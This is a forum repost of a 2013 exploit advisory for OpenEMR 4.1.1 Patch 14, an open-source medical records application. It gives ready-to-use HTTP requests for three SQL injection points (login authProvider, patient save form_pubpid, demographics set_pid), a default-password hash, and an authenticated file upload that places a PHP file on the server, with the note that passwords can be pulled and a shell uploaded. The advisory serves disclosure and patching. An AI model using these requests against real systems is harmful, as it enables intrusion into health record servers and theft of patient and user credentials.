Jump to content
cPanel

OpenEMR SQL Injection/ Shell Upload

Recommended Posts


#####################################
# Exploit Title: OpenEMR 4.1.1 Patch 14 Multiple Vulnerabilities
# Date: Sep 17 2013
# Exploit Author: xistence < xistence[at]0x90[.]nl >
# Vendor Homepage: [url=http://www.open-emr.org]OpenEMR Project[/url]
# Tested on: CentOS 5.9 32-bit
# Affected Version : 4.1.1 Patch 14 and lower
# Fix: Upgrade to OpenEMR 4.1.2
#
# Software details:
#
# OpenEMR is a Free and Open Source electronic health records and medical practice management application that can run
on
# Windows, Linux, Mac OS X, and many other platforms. OpenEMR is ONC Complete Ambulatory EHR certified and is one of
# the most popular open source electronic medical records in use today. OpenEMR is supported by a strong community of
# volunteers #and professionals all with the common goal of making OpenEMR a superior alternative to its proprietary
counterparts.
# The OpenEMR community is dedicated to guarding OpenEMR's status as a free, open source software solution for #
medicalpractices
# and is dedicated to maintaining a spirit of openness, kindness and cooperation.
#
#####################################


[ SQL Injection ]

[0x01] - The "authProvider" parameter in the "interface/main/main_screen.php" POST script is
vulnerable to SQL Injection. A valid "authPass" password is needed before injection is possible (hash below is
the default password "pass")

POST /openemr/interface/main/main_screen.php?auth=login&site=default HTTP/1.1
Host: <IP>
Referer: http://<IP>/openemr/interface/login/login.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 135

authProvider=Default'[SQLi]&authUser=admin&clearPass=&languageChoice=1&authPass=9d4e1e23bd5b727046a9e3b4
b7db57bd8d6ee684&authNewPass=

The POST request below could be used to retrieve passwords from other users and gain higher privileges (and after that
upload a shell)


[0x02] - The "form_pubid" parameter in the "interface/new/new_comprehensive_save.php" script is
vulnerable to SQL Injection.

POST /openemr/interface/new/new_comprehensive_save.php HTTP/1.1
Host: <IP>
Referer: http://<IP>/openemr/interface/new/new.php
Cookie: OpenEMR=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 286

form_cb_1=1&form_title=Mr.&form_fname=pwned&form_mname=&form_lname=pwned&form_pubpid=[SQLi]&form
_DOB=2013-07-15&form_sex=Female&form_ss=&form_drivers_license=&form_status=&form_genericname1=&f
orm_genericval1=&form_genericname2=&form_genericval2=&form_cb_2=1&form_street=&form_city=&form_s
tat


[0x03] - The "set_pid" parameter in the "interface/patient_file/summary/demographics.php" script is
vulnerable to SQL Injection.
http://<IP>/openemr/interface/patient_file/summary/demographics.php?set_pid=-1[SQLi]


[ Arbitrary file upload ]

[0x01] - It's possible to upload any file after being authenticated.

POST /openemr/interface/super/manage_site_files.php HTTP/1.1
Host: <IP>
Referer: http://<IP>/openemr/interface/super/manage_site_files.php
Cookie: OpenEMR=blahblahblah
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------6745387234061449481375110870
Content-Length: 355

-----------------------------6745387234061449481375110870
Content-Disposition: form-data; name="form_image"; filename="pwned.php"
Content-Type: text/php

<?php phpinfo(); ?>
-----------------------------6745387234061449481375110870
Content-Disposition: form-data; name="bn_save"

Save
-----------------------------6745387234061449481375110870--

Edited by TheTime
lipsa taguri
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...